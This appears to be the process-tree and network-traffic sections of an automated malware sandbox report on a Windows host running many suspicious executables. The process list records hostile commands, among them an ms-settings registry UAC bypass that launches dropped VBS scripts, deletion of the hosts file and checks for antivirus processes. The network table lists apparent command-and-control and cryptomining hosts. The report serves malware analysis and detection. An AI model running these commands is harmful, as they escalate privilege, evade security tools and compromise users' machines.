C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\5536.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1960.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1960.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\1960.vbs
C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\1960.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Users\Admin\Desktop\4363463463464363463463463\Files\dmshell.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\dmshell.exe"
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\5024.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\5024.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\5024.vbs
C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\5024.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Users\Admin\Desktop\4363463463464363463463463\Files\rstxdhuj.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\rstxdhuj.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_rstxdhuj.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_rstxdhuj.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\System.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\System.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_System.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_System.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\exbuild.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\exbuild.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_exbuild.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_exbuild.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\pornhub_downloader.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\pornhub_downloader.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_pornhub_downloader.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_pornhub_downloader.exe"
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Windows\SYSTEM32\cmd.exe
cmd
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 2260 -ip 2260
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1412
C:\Users\Admin\AppData\Local\Temp\is-0D8G3.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2\Install\0\a6260f82e0c39d59703b.exe
"C:\Users\Admin\AppData\Local\Temp\is-0D8G3.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2\Install\0\a6260f82e0c39d59703b.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6716 -ip 6716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1084
C:\Users\Admin\Desktop\New Text Document mod.exse\a\VBVEd6f.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\VBVEd6f.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Appreciate Appreciate.cmd && Appreciate.cmd
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 397506
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Concept + ..\Mix + ..\Trunk + ..\Answers + ..\Bufing + ..\Benefits + ..\Ram + ..\Guides k
C:\Users\Admin\AppData\Local\Temp\397506\Mesa.com
Mesa.com k
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\Desktop\New Text Document mod.exse\a\test12.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test12.exe"
C:\Program Files (x86)\Steam\bin\steamservice.exe
"C:\Program Files (x86)\Steam\bin\steamservice.exe" /Install
C:\Program Files (x86)\Steam\steam.exe
"C:\Program Files (x86)\Steam\steam.exe"
C:\Users\Admin\AppData\Local\Temp\is-0D8G3.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2\Install\1\1.exe
"C:\Users\Admin\AppData\Local\Temp\is-0D8G3.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2\Install\1\1.exe" --partner 7983 --distr /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y ILIGHT=1 VID=40"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| N/A | 127.0.0.1:52474 | tcp | |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 164.237.32.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:52482 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | support.mozilla.org | udp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 34.149.128.2:443 | us-west1.prod.sumo.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | 2.128.149.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ac.duckduckgo.com | udp |
| IE | 52.142.124.215:443 | ac.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.124.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| US | 8.8.8.8:53 | links.duckduckgo.com | udp |
| IE | 20.223.54.233:443 | links.duckduckgo.com | tcp |
| IE | 20.223.54.233:443 | links.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | links.duckduckgo.com | udp |
| US | 8.8.8.8:53 | links.duckduckgo.com | udp |
| US | 8.8.8.8:53 | 233.54.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | improving.duckduckgo.com | udp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | 222.125.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 216.72.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 88.221.134.155:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| GB | 172.217.169.46:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | 155.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| GB | 172.217.169.46:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r2---sn-5hnednss.gvt1.com | udp |
| NL | 172.217.132.199:443 | r2---sn-5hnednss.gvt1.com | tcp |
| US | 8.8.8.8:53 | r2.sn-5hnednss.gvt1.com | udp |
| US | 8.8.8.8:53 | 199.132.217.172.in-addr.arpa | udp |
| NL | 172.217.132.199:443 | r2.sn-5hnednss.gvt1.com | udp |
| US | 8.8.8.8:53 | r2.sn-5hnednss.gvt1.com | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.194.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| CN | 159.75.51.64:50051 | tcp | |
| KR | 203.232.37.151:80 | 203.232.37.151 | tcp |
| RU | 176.113.115.33:80 | 176.113.115.33 | tcp |
| US | 8.8.8.8:53 | 151.37.232.203.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.pornhub.com | udp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 206.217.142.166:1234 | tcp | |
| US | 8.8.8.8:53 | ei.phncdn.com | udp |
| US | 8.8.8.8:53 | static.trafficjunky.com | udp |
| GB | 64.210.156.20:443 | static.trafficjunky.com | tcp |
| GB | 64.210.156.20:443 | static.trafficjunky.com | tcp |
| GB | 64.210.156.21:443 | static.trafficjunky.com | tcp |
| GB | 64.210.156.21:443 | static.trafficjunky.com | tcp |
| GB | 64.210.156.21:443 | static.trafficjunky.com | tcp |
| GB | 64.210.156.21:443 | static.trafficjunky.com | tcp |
| GB | 64.210.156.21:443 | static.trafficjunky.com | tcp |
| GB | 64.210.156.21:443 | static.trafficjunky.com | tcp |
| US | 8.8.8.8:53 | 41.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | media.trafficjunky.net | udp |
| US | 8.8.8.8:53 | cdn1-smallimg.phncdn.com | udp |
| GB | 64.210.156.21:443 | media.trafficjunky.net | tcp |
| GB | 64.210.156.21:443 | media.trafficjunky.net | tcp |
| GB | 64.210.156.21:443 | media.trafficjunky.net | tcp |
| US | 66.254.114.156:443 | cdn1-smallimg.phncdn.com | tcp |
| US | 8.8.8.8:53 | a.adtng.com | udp |
| US | 8.8.8.8:53 | ss.phncdn.com | udp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 8.8.8.8:53 | 156.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.114.254.66.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | ht-cdn2.adtng.com | udp |
| GB | 64.210.156.22:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.22:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.22:443 | ht-cdn2.adtng.com | tcp |
| US | 8.8.8.8:53 | 22.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hw-cdn2.adtng.com | udp |
| GB | 64.210.156.2:443 | hw-cdn2.adtng.com | tcp |
| US | 8.8.8.8:53 | 2.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| GB | 172.217.16.251:443 | storage.googleapis.com | tcp |
| US | 8.8.8.8:53 | 251.16.217.172.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| BE | 142.251.173.156:443 | stats.g.doubleclick.net | tcp |
| GB | 142.250.179.227:443 | www.google.co.uk | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 8.8.8.8:53 | 156.173.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| HK | 18.163.238.67:80 | 18.163.238.67 | tcp |
| US | 8.8.8.8:53 | 67.238.163.18.in-addr.arpa | udp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| US | 8.8.8.8:53 | 36.113.215.185.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| RU | 185.215.113.26:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | softcatalog.ru | udp |
| RU | 88.212.252.98:443 | softcatalog.ru | tcp |
| US | 8.8.8.8:53 | 98.252.212.88.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| NL | 85.31.47.135:80 | 85.31.47.135 | tcp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.47.31.85.in-addr.arpa | udp |
| NL | 188.190.10.161:4444 | tcp | |
| RU | 185.215.113.26:80 | tcp | |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | utorrent-backup-server4.top | udp |
| BG | 87.121.86.16:80 | utorrent-backup-server4.top | tcp |
| US | 8.8.8.8:53 | 16.86.121.87.in-addr.arpa | udp |
| BG | 87.121.86.206:80 | 87.121.86.206 | tcp |
| US | 8.8.8.8:53 | 206.86.121.87.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | pivko.sbs | udp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | frojbdawmiojfg.sytes.net | udp |
| LV | 198.181.163.35:4410 | frojbdawmiojfg.sytes.net | tcp |
| US | 8.8.8.8:53 | 137.8.203.116.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 158.101.35.62:9000 | 158.101.35.62 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | 62.35.101.158.in-addr.arpa | udp |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 65.72.156.185.in-addr.arpa | udp |
| TH | 154.197.69.165:80 | 154.197.69.165 | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | 165.69.197.154.in-addr.arpa | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| IE | 185.166.142.22:443 | bitbucket.org | tcp |
| IE | 185.166.142.22:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 16.15.192.152:443 | bbuseruploads.s3.amazonaws.com | tcp |
| HK | 118.193.37.157:8889 | 118.193.37.157 | tcp |
| US | 8.8.8.8:53 | 22.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.192.15.16.in-addr.arpa | udp |
| US | 16.15.192.152:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 157.37.193.118.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| NL | 188.190.10.161:4444 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| LV | 198.181.163.35:4410 | frojbdawmiojfg.sytes.net | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 16.15.192.152:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| NL | 188.190.10.161:4444 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| LV | 198.181.163.35:4410 | frojbdawmiojfg.sytes.net | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 33.207.178.68.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 172.105.66.118:80 | 172.105.66.118 | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 118.66.105.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deauduafzgezzfgm.top | udp |
| RU | 185.215.113.66:80 | deauduafzgezzfgm.top | tcp |
| DE | 172.105.66.118:8080 | tcp | |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 8.8.8.8:53 | frojbdawmiojfg.sytes.net | udp |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| US | 20.83.148.22:80 | tcp | |
| LV | 198.181.163.35:4410 | frojbdawmiojfg.sytes.net | tcp |
| US | 20.83.148.22:80 | tcp | |
| NL | 188.190.10.161:4444 | tcp | |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | venom.underground-cheat.com | udp |
| NL | 85.31.47.143:39001 | venom.underground-cheat.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 143.47.31.85.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | frogmen-smell.sbs | udp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 8.8.8.8:53 | 133.174.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ratsinthehole.com | udp |
| US | 8.8.8.8:53 | 18.89.109.52.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | cheat.underground-cheat.com | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 85.31.47.135:80 | cheat.underground-cheat.com | tcp |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 68.178.207.33:7000 | tcp | |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
